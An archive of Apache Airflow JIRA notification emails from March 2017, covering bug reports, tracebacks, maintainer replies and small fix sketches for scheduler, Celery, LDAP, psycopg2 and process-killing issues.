> mentioned in the link below.
> More info:
> https://www.mail-archive.com/dev@airflow.incubator.apache.org/msg00746.html
> http://stackoverflow.com/questions/21634680/running-unicorn-behind-amazon-elb



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Commented] (AIRFLOW-890) Having a REST layer for all command line interface of Airflow

2017-03-14 Thread Bolke de Bruin (JIRA)

[ 
https://issues.apache.org/jira/browse/AIRFLOW-890?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15924948#comment-15924948
 ] 

Bolke de Bruin commented on AIRFLOW-890:


Any help definitely welcome here. We have example endpoints.

> Having a REST layer for all command line interface of Airflow
> -
>
> Key: AIRFLOW-890
> URL: https://issues.apache.org/jira/browse/AIRFLOW-890
> Project: Apache Airflow
>  Issue Type: Wish
>  Components: cli
>Reporter: Amit Ghosh
>   Original Estimate: 504h
>  Remaining Estimate: 504h
>
> We are planning to use Airflow and were wondering if we can have a REST 
> interface for the whole command line interface. This would be a cool feature 
> to have. If you all agree, I can take up that task.
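
Purely as a toy illustration of the wish (not the project's existing example endpoints): a minimal Flask wrapper that exposes one CLI command over REST by shelling out to the `airflow` binary.

{code}
from flask import Flask, jsonify
import subprocess

app = Flask(__name__)

@app.route("/api/dags/<dag_id>/trigger", methods=["POST"])
def trigger_dag(dag_id):
    # Equivalent to running: airflow trigger_dag <dag_id>
    proc = subprocess.run(["airflow", "trigger_dag", dag_id],
                          capture_output=True, text=True)
    status = 200 if proc.returncode == 0 else 500
    return jsonify(returncode=proc.returncode, output=proc.stdout), status

if __name__ == "__main__":
    app.run(port=8081)
{code}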



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Resolved] (AIRFLOW-906) Update Code icon from lightning bolt to file

2017-03-14 Thread Bolke de Bruin (JIRA)

 [ 
https://issues.apache.org/jira/browse/AIRFLOW-906?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Bolke de Bruin resolved AIRFLOW-906.

   Resolution: Fixed
Fix Version/s: 1.8.1

> Update Code icon from lightning bolt to file
> 
>
> Key: AIRFLOW-906
> URL: https://issues.apache.org/jira/browse/AIRFLOW-906
> Project: Apache Airflow
>  Issue Type: Improvement
>  Components: webapp
>Reporter: Dan Jarratt
>Priority: Minor
> Fix For: 1.8.1
>
> Attachments: airflow-current-flash-icon.png, 
> airflow-suggested-file-icon.png
>
>
> Lightning bolts are not a visual metaphor for code or files. Since Glyphicon 
> doesn't have a code icon (<>, for instance), we should use its file icon.



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Work started] (AIRFLOW-982) Update examples/docs for ALL_SUCCESS/ONE_SUCCESS including skipped

2017-03-14 Thread Daniel Huang (JIRA)

 [ 
https://issues.apache.org/jira/browse/AIRFLOW-982?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Work on AIRFLOW-982 started by Daniel Huang.

> Update examples/docs for ALL_SUCCESS/ONE_SUCCESS including skipped
> --
>
> Key: AIRFLOW-982
> URL: https://issues.apache.org/jira/browse/AIRFLOW-982
> Project: Apache Airflow
>  Issue Type: Improvement
>  Components: docs, examples
>Reporter: Daniel Huang
>Assignee: Daniel Huang
>Priority: Minor
>




--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Created] (AIRFLOW-983) Make trigger rules more explicit regarding success vs skipped

2017-03-14 Thread Daniel Huang (JIRA)
Daniel Huang created AIRFLOW-983:


 Summary: Make trigger rules more explicit regarding success vs 
skipped
 Key: AIRFLOW-983
 URL: https://issues.apache.org/jira/browse/AIRFLOW-983
 Project: Apache Airflow
  Issue Type: Improvement
  Components: dependencies
Reporter: Daniel Huang


Since AIRFLOW-719, the trigger rules all_success/one_success include both 
success and skipped states.

We should probably make ALL_SUCCESS strictly success (again) and add separate 
ALL_SUCCESS_OR_SKIPPED/ALL_FAILED_OR_SKIPPED rules. ALL_SUCCESS_OR_SKIPPED may be 
a more appropriate default trigger rule as well. Otherwise, we need to note in the 
LatestOnly/ShortCircuit/Branch operators which trigger rule is appropriate to use 
there.

Some previous discussion in 
https://github.com/apache/incubator-airflow/pull/1961
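
For context, a sketch of how a trigger rule is set today (import paths as of Airflow 1.8, to the best of my knowledge); `trigger_rule` is a real BaseOperator argument, the `*_OR_SKIPPED` names are only the proposal above, and `dag` is assumed to be defined:

{code}
from airflow.operators.dummy_operator import DummyOperator
from airflow.utils.trigger_rule import TriggerRule

join = DummyOperator(
    task_id="join",
    trigger_rule=TriggerRule.ALL_SUCCESS,  # since AIRFLOW-719: also satisfied by skips
    dag=dag,
)
# Proposed (hypothetical): trigger_rule=TriggerRule.ALL_SUCCESS_OR_SKIPPED
{code}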



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Created] (AIRFLOW-982) Update examples/docs for ALL_SUCCESS/ONE_SUCCESS including skipped

2017-03-14 Thread Daniel Huang (JIRA)
Daniel Huang created AIRFLOW-982:


 Summary: Update examples/docs for ALL_SUCCESS/ONE_SUCCESS 
including skipped
 Key: AIRFLOW-982
 URL: https://issues.apache.org/jira/browse/AIRFLOW-982
 Project: Apache Airflow
  Issue Type: Improvement
  Components: docs, examples
Reporter: Daniel Huang
Assignee: Daniel Huang
Priority: Minor






--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Resolved] (AIRFLOW-927) LDAP authorization: ldap3 doesn't understand anything coming from configuration file

2017-03-14 Thread Bolke de Bruin (JIRA)

 [ 
https://issues.apache.org/jira/browse/AIRFLOW-927?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Bolke de Bruin resolved AIRFLOW-927.

   Resolution: Fixed
Fix Version/s: 1.8.0

> LDAP authorization: ldap3 doesn't understand anything coming from the 
> configuration file
> -
>
> Key: AIRFLOW-927
> URL: https://issues.apache.org/jira/browse/AIRFLOW-927
> Project: Apache Airflow
>  Issue Type: Bug
>  Components: contrib
>Affects Versions: Airflow 1.8, Airflow 1.7.1.3
>Reporter: Marcelo G. Almiron
> Fix For: 1.8.0
>
>
> Function `get_ldap_connection` in airflow/contrib/auth/backends/ldap_auth.py 
> does not understand 'future.types.newstr.newstr' objects coming from 
> `configuration.get("ldap", "bind_user")` and `configuration.get("ldap", 
> "bind_password")`.
> The same can be observed in the `group_contains_user` function. Here the 
> `search` function does not consider the arguments `configuration.get("ldap", 
> "basedn")`, `configuration.get("ldap", "superuser_filter")`, nor 
> `configuration.get("ldap", "user_name_attr")` as expected. 
> A quick fix would be to convert all these values to `str` as soon as they are 
> read from the configuration file, but this is not a definitive fix.
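
A sketch of the quick fix described above: coerce the future-library newstr values to native str as soon as they are read from the configuration (section/key names as used in ldap_auth.py):

{code}
from airflow import configuration

# Coerce newstr -> native str right after reading the config:
bind_user      = str(configuration.get("ldap", "bind_user"))
bind_password  = str(configuration.get("ldap", "bind_password"))
basedn         = str(configuration.get("ldap", "basedn"))
user_name_attr = str(configuration.get("ldap", "user_name_attr"))
{code}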



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Commented] (AIRFLOW-928) Same {task,execution_date} run multiple times in worker when using CeleryExecutor

2017-03-14 Thread Bolke de Bruin (JIRA)

[ 
https://issues.apache.org/jira/browse/AIRFLOW-928?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15924861#comment-15924861
 ] 

Bolke de Bruin commented on AIRFLOW-928:


[~saguziel] have you seen this?

> Same {task,execution_date} run multiple times in worker when using 
> CeleryExecutor
> -
>
> Key: AIRFLOW-928
> URL: https://issues.apache.org/jira/browse/AIRFLOW-928
> Project: Apache Airflow
>  Issue Type: Bug
>  Components: celery
>Affects Versions: Airflow 1.7.1.3
> Environment: Docker
>Reporter: Uri Shamay
> Attachments: airflow.log, dag_runs.png, dummy_dag.py, processes.list, 
> rabbitmq.queue, scheduler.log, worker_2.log, worker.log
>
>
> Hi,
> When using Airflow with the CeleryExecutor (I tested both RabbitMQ and Redis), 
> I see that when workers are down, the scheduler keeps **appending** the same 
> {task,execution_date} to the same key in the broker each scheduling period, 
> which means that if workers are down or can't connect to the broker for a few 
> hours, the broker ends up with thousands of copies of the same executions.
> In my scenario I have just one dummy dag to run, with dag_concurrency of 4.
> I expected the broker to hold just 4 messages in that scenario; the scheduler 
> shouldn't queue another and another and another for the same {task, 
> execution_date}.
> What happens is that when workers start to consume messages, they get 
> thousands of messages for just 4 tasks, and when they try to write the 
> task_instances to the database there are integrity errors, because such 
> {task,execution_date} rows already exist.
> Note that in my test, after letting Airflow schedule work for just one dag 
> without workers for a few hours, I connected to the broker with a custom 
> client and retrieved the messages - there were thousands of identical 
> {dag,execution_date} entries.
> Even if only one instance actually runs when thousands with the same key are 
> polled, it's still bad behavior; it would be better to produce one message to 
> the queue, and if some timeout occurs (like visibility), to set the key - and 
> not append to it. (A toy sketch of this idea follows the attachment list.)
> What happens is that when workers are down for a long time with a lot of jobs 
> scheduled every minute, when the workers come back they get thousands of 
> copies of the same jobs => the worker runs the same dags many times => a lot 
> of wasted python runners => all celery worker threads/processes are utilized 
> => all other jobs starve until it figures out that it needs just one instance 
> of each.
> Attached files:
> 1. airflow.log - the task log; you can see several instances/processes of the 
> same {task,execution_date} writing to the same log file.
> 2. worker.log - the worker log; you can see the worker trying to run the same 
> {task,execution_date} multiple times, plus the database integrity errors 
> saying that those tasks on those dates already exist.
> 3. scheduler.log - shows that the scheduler decided to send the same 
> {job,execution_date} again and again, infinitely.
> 4. dummy_dag.py - the dag used for the test.
> 5. rabbitmq.queue - shows that after 5 minutes the broker queue contains 40 
> messages for the same 4 {job,execution_date}.
> 6. dag_runs.png - shows that there are only 4 jobs that need to run, while 
> there are many more messages in the queue.
> 7. processes.list - shows that when the worker starts, `ps -ef | grep 
> "airflow run"` lists the same {job,execution_date} running multiple times.
> 8. worker_2.log - shows that when the worker started, the same 
> {job,execution_date} keys appeared multiple times.
> Thanks.
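
A toy sketch of the set-instead-of-append idea; `broker.send` is a hypothetical client call, not an Airflow or Celery API:

{code}
queued = set()

def enqueue_once(broker, task_id, execution_date, command):
    """Enqueue each (task_id, execution_date) at most once."""
    key = (task_id, execution_date)
    if key in queued:
        return False          # already queued while workers were down
    broker.send(command)      # hypothetical broker client
    queued.add(key)
    return True
{code}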



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Commented] (AIRFLOW-980) IntegrityError: (psycopg2.IntegrityError) duplicate key value violates unique constraint "dag_run_dag_id_key" on sample DAGs

2017-03-14 Thread Ruslan Dautkhanov (JIRA)

[ 
https://issues.apache.org/jira/browse/AIRFLOW-980?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15924862#comment-15924862
 ] 

Ruslan Dautkhanov commented on AIRFLOW-980:
---

Thanks for the prompt response, [~bolke]. I will give it a try and report back here.

> IntegrityError: (psycopg2.IntegrityError) duplicate key value violates unique 
> constraint "dag_run_dag_id_key" on sample DAGs
> 
>
> Key: AIRFLOW-980
> URL: https://issues.apache.org/jira/browse/AIRFLOW-980
> Project: Apache Airflow
>  Issue Type: Bug
>Affects Versions: Airflow 1.7.1.3
> Environment: Local Executor
> postgresql+psycopg2 database backend
>Reporter: Ruslan Dautkhanov
>
> Fresh Airflow install using pip.
> Only sample DAGs are installed.
> LocalExecutor (4 workers).
> Most of the parameters are at defaults.
> Turned On all of the sample DAGs (14 of them).
> After some execution (a lot of DAGs had at least one successful execution), I 
> started seeing the error stack below again and again in the scheduler log.
> {noformat}
> IntegrityError: (psycopg2.IntegrityError) duplicate key value violates unique 
> constraint "dag_run_dag_id_key"
>  [SQL: 'INSERT INTO dag_run (dag_id, execution_date, start_date, end_date, 
> state, run_id, external_trigger, conf) VALUES (%(dag_id)s, 
> %(execution_date)s, %(start_date)s, %(end_date)s, %(state)s, %(run_id)s, 
> %(external_trigger)s, %(conf)s) RETURNING dag_run.id'] [parameters: 
> {'end_date': None, 'run_id': u'scheduled__2015-01-01T00:00:00', 
> 'execution_date': datetime.datetime(2015, 1, 1, 0, 0), 'external_trigger': 
> False, 'state': u'running', 'conf': None, 'start_date': 
> datetime.datetime(2017, 3, 14, 11, 12, 29, 646995), 'dag_id': 'example_xcom'}]
> Process Process-152:
> Traceback (most recent call last):
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/multiprocessing/process.py", 
> line 258, in _bootstrap
> self.run()
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/multiprocessing/process.py", 
> line 114, in run
> self._target(*self._args, **self._kwargs)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/airflow/jobs.py", 
> line 664, in _do_dags
> dag = dagbag.get_dag(dag.dag_id)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/airflow/models.py",
>  line 188, in get_dag
> orm_dag = DagModel.get_current(root_dag_id)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/airflow/models.py",
>  line 2320, in get_current
> obj = session.query(cls).filter(cls.dag_id == dag_id).first()
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/query.py",
>  line 2634, in first
> ret = list(self[0:1])
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/query.py",
>  line 2457, in __getitem__
> return list(res)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/query.py",
>  line 2736, in __iter__
> return self._execute_and_instances(context)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/query.py",
>  line 2749, in _execute_and_instances
> close_with_result=True)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/query.py",
>  line 2740, in _connection_from_session
> **kw)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/session.py",
>  line 893, in connection
> execution_options=execution_options)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/session.py",
>  line 898, in _connection_for_bind
> engine, execution_options)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/session.py",
>  line 313, in _connection_for_bind
> self._assert_active()
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/session.py",
>  line 214, in _assert_active
> % self._rollback_exception
> InvalidRequestError: This Session's transaction has been rolled back due to a 
> previous exception during flush. To begin a new transaction with this 
> Session, first issue Session.rollback(). Original exception was: 
> (psycopg2.IntegrityError) duplicate key value violates unique constraint 
> "dag_run_dag_id_key"
>  [SQL: 'INSERT INTO dag_run (dag_id, execution_date, start_date, end_date, 
> state, run_id, external_trigger, conf) VALUES (%(dag_id)s, 
> %(execution_date)s, %(start_date)s, %(end_date)s, %(state)s, %(run_id)s, 
> %(external_trigger)s, %(conf)s) RETURNING dag_run.id'] [parameters: 
> {'end_date': None, 'run_id': u'scheduled__2015-01-01T00:00:00', 
> 'execution_date': datetime.datetime(2015, 1, 1, 

[jira] [Commented] (AIRFLOW-949) kill_process_tree does not kill the root process

2017-03-14 Thread Bolke de Bruin (JIRA)

[ 
https://issues.apache.org/jira/browse/AIRFLOW-949?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15924840#comment-15924840
 ] 

Bolke de Bruin commented on AIRFLOW-949:


[~saguziel] [~aoen]

> kill_process_tree does not kill the root process
> 
>
> Key: AIRFLOW-949
> URL: https://issues.apache.org/jira/browse/AIRFLOW-949
> Project: Apache Airflow
>  Issue Type: Bug
>  Components: utils
>Affects Versions: 1.8.0rc4
>Reporter: Erik Cederstrand
>  Labels: patch
> Attachments: helpers.patch
>
>
> The kill_process_tree() function in airflow/utils/helpers.py does not attempt 
> to kill the root process. Since there's also a kill_descendant_processes() 
> function, I assume that was the intent.
> Also, according to the comments, the intent is to first send SIGTERM, and 
> then SIGKILL, to descendant processes. But in fact, SIGTERM is sent twice.
> The attached patch fixes both problems.
> This was found while investigating why the airflow worker would not kill 
> certain jobs that had crashed. 
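
An illustrative sketch (not the attached patch) of a tree kill that includes the root and escalates from SIGTERM to SIGKILL, using psutil:

{code}
import psutil

def kill_process_tree(pid, term_timeout=5):
    root = psutil.Process(pid)
    procs = root.children(recursive=True) + [root]   # include the root itself
    for p in procs:
        try:
            p.terminate()                            # SIGTERM first
        except psutil.NoSuchProcess:
            pass
    gone, alive = psutil.wait_procs(procs, timeout=term_timeout)
    for p in alive:
        p.kill()                                     # SIGKILL the stragglers
{code}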



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Resolved] (AIRFLOW-934) airflow delayed the task to start

2017-03-14 Thread Bolke de Bruin (JIRA)

 [ 
https://issues.apache.org/jira/browse/AIRFLOW-934?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Bolke de Bruin resolved AIRFLOW-934.

Resolution: Won't Fix

1.6.1 is an unsupported version. Report back if the same issue exists on 1.8.0 
(rc5).

> airflow delayed the task to start 
> --
>
> Key: AIRFLOW-934
> URL: https://issues.apache.org/jira/browse/AIRFLOW-934
> Project: Apache Airflow
>  Issue Type: Bug
>  Components: DagRun
>Affects Versions: Airflow 1.6.2
>Reporter: Yajun Dong
>Priority: Blocker
>
> We have a complex DAG which includes many tasks, but recently we found that 
> some tasks start delayed. For instance: 
> start_task (starts at 00:00) --> create_cluster (finishes at 
> 00:11) --> wait_task (starts at 00:16). 
> Note: 
> 1. wait_task has only one upstream task, which is create_cluster. 
> 2. the server that hosts Airflow has enough memory, and 
> celeryd_concurrency is 20. 
> Below is the log of wait_task: 
> [2017-03-02 00:16:39,602] {models.py:124} INFO - Filling up the DagBag from 
> /home/ubuntu/airflow/dags/etl_prod/etl_prod.py
> [2017-03-02 00:16:39,603] {models.py:197} INFO - Importing 
> /home/ubuntu/airflow/dags/etl_prod/etl_prod.py
> [2017-03-02 00:16:39,613] {models.py:284} INFO - Loaded DAG 
> [2017-03-02 00:16:40,333] {models.py:124} INFO - Filling up the DagBag from 
> /home/ubuntu/airflow/dags/etl_prod/etl_prod.py
> [2017-03-02 00:16:40,333] {models.py:197} INFO - Importing 
> /home/ubuntu/airflow/dags/etl_prod/etl_prod.py
> [2017-03-02 00:16:40,345] {models.py:284} INFO - Loaded DAG 
> [2017-03-02 00:16:40,373] {models.py:936} INFO - 
> 
> New run starting @2017-03-02T00:16:40.369560
> 
> [2017-03-02 00:16:40,402] {models.py:951} INFO - Queuing into pool None
> [2017-03-02 00:22:31,161] {models.py:124} INFO - Filling up the DagBag from 
> /home/ubuntu/airflow/dags/etl_prod/etl_prod.py
> [2017-03-02 00:22:31,162] {models.py:197} INFO - Importing 
> /home/ubuntu/airflow/dags/etl_prod/etl_prod.py
> [2017-03-02 00:22:31,172] {models.py:284} INFO - Loaded DAG 
> [2017-03-02 00:22:31,863] {models.py:124} INFO - Filling up the DagBag from 
> /home/ubuntu/airflow/dags/etl_prod/etl_prod.py
> [2017-03-02 00:22:31,863] {models.py:197} INFO - Importing 
> /home/ubuntu/airflow/dags/etl_prod/etl_prod.py
> [2017-03-02 00:22:31,874] {models.py:284} INFO - Loaded DAG 
> [2017-03-02 00:22:31,901] {models.py:936} INFO - 
> 
> New run starting @2017-03-02T00:22:31.897547
> 
> [2017-03-02 00:22:31,911] {models.py:974} INFO - Executing 
>  on 2017-03-01 00:00:00
> [2017-03-02 00:22:31,922] {bash_operator.py:52} INFO - tmp dir root location: 
> /tmp



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Commented] (AIRFLOW-934) airflow delayed the task to start

2017-03-14 Thread Bolke de Bruin (JIRA)

[ 
https://issues.apache.org/jira/browse/AIRFLOW-934?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15924852#comment-15924852
 ] 

Bolke de Bruin commented on AIRFLOW-934:


Try with 1.8.0rc5 - 1.6.1 is not supported anymore.

> airflow delayed the task to start 
> --
>
> Key: AIRFLOW-934
> URL: https://issues.apache.org/jira/browse/AIRFLOW-934
> Project: Apache Airflow
>  Issue Type: Bug
>  Components: DagRun
>Affects Versions: Airflow 1.6.2
>Reporter: Yajun Dong
>Priority: Blocker
>
> We have a complex DAG which includes many tasks, but recently we found that 
> some tasks start delayed. For instance: 
> start_task (starts at 00:00) --> create_cluster (finishes at 
> 00:11) --> wait_task (starts at 00:16). 
> Note: 
> 1. wait_task has only one upstream task, which is create_cluster. 
> 2. the server that hosts Airflow has enough memory, and 
> celeryd_concurrency is 20. 
> Below is the log of wait_task: 
> [2017-03-02 00:16:39,602] {models.py:124} INFO - Filling up the DagBag from 
> /home/ubuntu/airflow/dags/etl_prod/etl_prod.py
> [2017-03-02 00:16:39,603] {models.py:197} INFO - Importing 
> /home/ubuntu/airflow/dags/etl_prod/etl_prod.py
> [2017-03-02 00:16:39,613] {models.py:284} INFO - Loaded DAG 
> [2017-03-02 00:16:40,333] {models.py:124} INFO - Filling up the DagBag from 
> /home/ubuntu/airflow/dags/etl_prod/etl_prod.py
> [2017-03-02 00:16:40,333] {models.py:197} INFO - Importing 
> /home/ubuntu/airflow/dags/etl_prod/etl_prod.py
> [2017-03-02 00:16:40,345] {models.py:284} INFO - Loaded DAG 
> [2017-03-02 00:16:40,373] {models.py:936} INFO - 
> 
> New run starting @2017-03-02T00:16:40.369560
> 
> [2017-03-02 00:16:40,402] {models.py:951} INFO - Queuing into pool None
> [2017-03-02 00:22:31,161] {models.py:124} INFO - Filling up the DagBag from 
> /home/ubuntu/airflow/dags/etl_prod/etl_prod.py
> [2017-03-02 00:22:31,162] {models.py:197} INFO - Importing 
> /home/ubuntu/airflow/dags/etl_prod/etl_prod.py
> [2017-03-02 00:22:31,172] {models.py:284} INFO - Loaded DAG 
> [2017-03-02 00:22:31,863] {models.py:124} INFO - Filling up the DagBag from 
> /home/ubuntu/airflow/dags/etl_prod/etl_prod.py
> [2017-03-02 00:22:31,863] {models.py:197} INFO - Importing 
> /home/ubuntu/airflow/dags/etl_prod/etl_prod.py
> [2017-03-02 00:22:31,874] {models.py:284} INFO - Loaded DAG 
> [2017-03-02 00:22:31,901] {models.py:936} INFO - 
> 
> New run starting @2017-03-02T00:22:31.897547
> 
> [2017-03-02 00:22:31,911] {models.py:974} INFO - Executing 
>  on 2017-03-01 00:00:00
> [2017-03-02 00:22:31,922] {bash_operator.py:52} INFO - tmp dir root location: 
> /tmp



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Closed] (AIRFLOW-937) task_stats makes extremely large prepared query

2017-03-14 Thread Bolke de Bruin (JIRA)

 [ 
https://issues.apache.org/jira/browse/AIRFLOW-937?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Bolke de Bruin closed AIRFLOW-937.
--
Resolution: Fixed

> task_stats makes extremely large prepared query
> ---
>
> Key: AIRFLOW-937
> URL: https://issues.apache.org/jira/browse/AIRFLOW-937
> Project: Apache Airflow
>  Issue Type: Improvement
>Reporter: Alex Guziel
>Assignee: Alex Guziel
>
> Right now, the task_stats endpoint makes a few extremely long queries. We can 
> give up some accuracy and get huge speed wins.



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Resolved] (AIRFLOW-941) Psycopg2 2.7.0 has a regression when port is 'None'

2017-03-14 Thread Bolke de Bruin (JIRA)

 [ 
https://issues.apache.org/jira/browse/AIRFLOW-941?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Bolke de Bruin resolved AIRFLOW-941.

Resolution: Fixed

> Psycopg2 2.7.0 has a regression when port is 'None'
> ---
>
> Key: AIRFLOW-941
> URL: https://issues.apache.org/jira/browse/AIRFLOW-941
> Project: Apache Airflow
>  Issue Type: Bug
>  Components: operators
>Affects Versions: 1.8.0rc4
>Reporter: Bolke de Bruin
>Assignee: Bolke de Bruin
> Fix For: 1.8.0rc5
>
>
> The workaround is to not specify username/password if they are not available. 
> See the external issue URL.
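
A sketch of that workaround, assuming an Airflow Connection object `conn`: pass optional fields to psycopg2 only when they are set, so psycopg2 2.7.0 never receives port=None.

{code}
import psycopg2

# Build connect() kwargs from an Airflow Connection, skipping unset fields:
conn_args = dict(host=conn.host, dbname=conn.schema)
if conn.login:
    conn_args["user"] = conn.login
if conn.password:
    conn_args["password"] = conn.password
if conn.port:
    conn_args["port"] = conn.port

pg_conn = psycopg2.connect(**conn_args)
{code}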



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Resolved] (AIRFLOW-948) cannot run "airflow initdb"

2017-03-14 Thread Bolke de Bruin (JIRA)

 [ 
https://issues.apache.org/jira/browse/AIRFLOW-948?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Bolke de Bruin resolved AIRFLOW-948.

Resolution: Later

> cannot run "airflow initdb"
> ---
>
> Key: AIRFLOW-948
> URL: https://issues.apache.org/jira/browse/AIRFLOW-948
> Project: Apache Airflow
>  Issue Type: Bug
>Affects Versions: Airflow 1.7.1
> Environment: Debian Jessie 8.2, Python 2.7.9, Python 3.4.2
>Reporter: Tony Kucera
>
> [2017-03-07 08:45:38,241] {__init__.py:36} INFO - Using executor 
> SequentialExecutor
> [2017-03-07 08:45:38,538] {driver.py:120} INFO - Generating grammar tables 
> from /usr/lib/python3.4/lib2to3/Grammar.txt
> [2017-03-07 08:45:38,578] {driver.py:120} INFO - Generating grammar tables 
> from /usr/lib/python3.4/lib2to3/PatternGrammar.txt
> DB: sqlite:root/airflow/airflow.db
> [2017-03-07 08:45:38,898] {db.py:222} INFO - Creating tables
> INFO  [alembic.runtime.migration] Context impl SQLiteImpl.
> INFO  [alembic.runtime.migration] Will assume non-transactional DDL.
> ERROR [airflow.models.DagBag] Failed to import: 
> /usr/local/lib/python3.4/dist-packages/airflow/example_dags/example_twitter_dag.py
> Traceback (most recent call last):
>   File "/usr/local/lib/python3.4/dist-packages/airflow/models.py", line 247, 
> in process_file
> m = imp.load_source(mod_name, filepath)
>   File "/usr/lib/python3.4/imp.py", line 171, in load_source
> module = methods.load()
>   File "", line 1220, in load
>   File "", line 1200, in _load_unlocked
>   File "", line 1129, in _exec
>   File "", line 1471, in exec_module
>   File "", line 321, in _call_with_frames_removed
>   File 
> "/usr/local/lib/python3.4/dist-packages/airflow/example_dags/example_twitter_dag.py",
>  line 26, in 
> from airflow.operators import BashOperator, HiveOperator, PythonOperator
> ImportError: cannot import name 'HiveOperator'



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Commented] (AIRFLOW-948) cannot run "airflow initdb"

2017-03-14 Thread Bolke de Bruin (JIRA)

[ 
https://issues.apache.org/jira/browse/AIRFLOW-948?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15924842#comment-15924842
 ] 

Bolke de Bruin commented on AIRFLOW-948:


pip install airflow[hive]

> cannot run "airflow initdb"
> ---
>
> Key: AIRFLOW-948
> URL: https://issues.apache.org/jira/browse/AIRFLOW-948
> Project: Apache Airflow
>  Issue Type: Bug
>Affects Versions: Airflow 1.7.1
> Environment: Debian Jessie 8.2, Python 2.7.9, Python 3.4.2
>Reporter: Tony Kucera
>
> [2017-03-07 08:45:38,241] {__init__.py:36} INFO - Using executor 
> SequentialExecutor
> [2017-03-07 08:45:38,538] {driver.py:120} INFO - Generating grammar tables 
> from /usr/lib/python3.4/lib2to3/Grammar.txt
> [2017-03-07 08:45:38,578] {driver.py:120} INFO - Generating grammar tables 
> from /usr/lib/python3.4/lib2to3/PatternGrammar.txt
> DB: sqlite:root/airflow/airflow.db
> [2017-03-07 08:45:38,898] {db.py:222} INFO - Creating tables
> INFO  [alembic.runtime.migration] Context impl SQLiteImpl.
> INFO  [alembic.runtime.migration] Will assume non-transactional DDL.
> ERROR [airflow.models.DagBag] Failed to import: 
> /usr/local/lib/python3.4/dist-packages/airflow/example_dags/example_twitter_dag.py
> Traceback (most recent call last):
>   File "/usr/local/lib/python3.4/dist-packages/airflow/models.py", line 247, 
> in process_file
> m = imp.load_source(mod_name, filepath)
>   File "/usr/lib/python3.4/imp.py", line 171, in load_source
> module = methods.load()
>   File "", line 1220, in load
>   File "", line 1200, in _load_unlocked
>   File "", line 1129, in _exec
>   File "", line 1471, in exec_module
>   File "", line 321, in _call_with_frames_removed
>   File 
> "/usr/local/lib/python3.4/dist-packages/airflow/example_dags/example_twitter_dag.py",
>  line 26, in 
> from airflow.operators import BashOperator, HiveOperator, PythonOperator
> ImportError: cannot import name 'HiveOperator'
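
A defensive sketch of how an example DAG could tolerate the missing extra that the fix above installs (an illustration, not the shipped example_twitter_dag):

{code}
try:
    # Works only after `pip install airflow[hive]`:
    from airflow.operators import HiveOperator
except ImportError:
    HiveOperator = None  # the DAG definition below can check this and bail out
{code}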



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Commented] (AIRFLOW-980) IntegrityError: (psycopg2.IntegrityError) duplicate key value violates unique constraint "dag_run_dag_id_key" on sample DAGs

2017-03-14 Thread Ruslan Dautkhanov (JIRA)

[ 
https://issues.apache.org/jira/browse/AIRFLOW-980?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15924821#comment-15924821
 ] 

Ruslan Dautkhanov commented on AIRFLOW-980:
---

Thanks, [~bolke]. How do I install 1.8.0rc5? Can I do this using pip, or is there 
another way to install a dev version?


> IntegrityError: (psycopg2.IntegrityError) duplicate key value violates unique 
> constraint "dag_run_dag_id_key" on sample DAGs
> 
>
> Key: AIRFLOW-980
> URL: https://issues.apache.org/jira/browse/AIRFLOW-980
> Project: Apache Airflow
>  Issue Type: Bug
>Affects Versions: Airflow 1.7.1.3
> Environment: Local Executor
> postgresql+psycopg2 database backend
>Reporter: Ruslan Dautkhanov
>
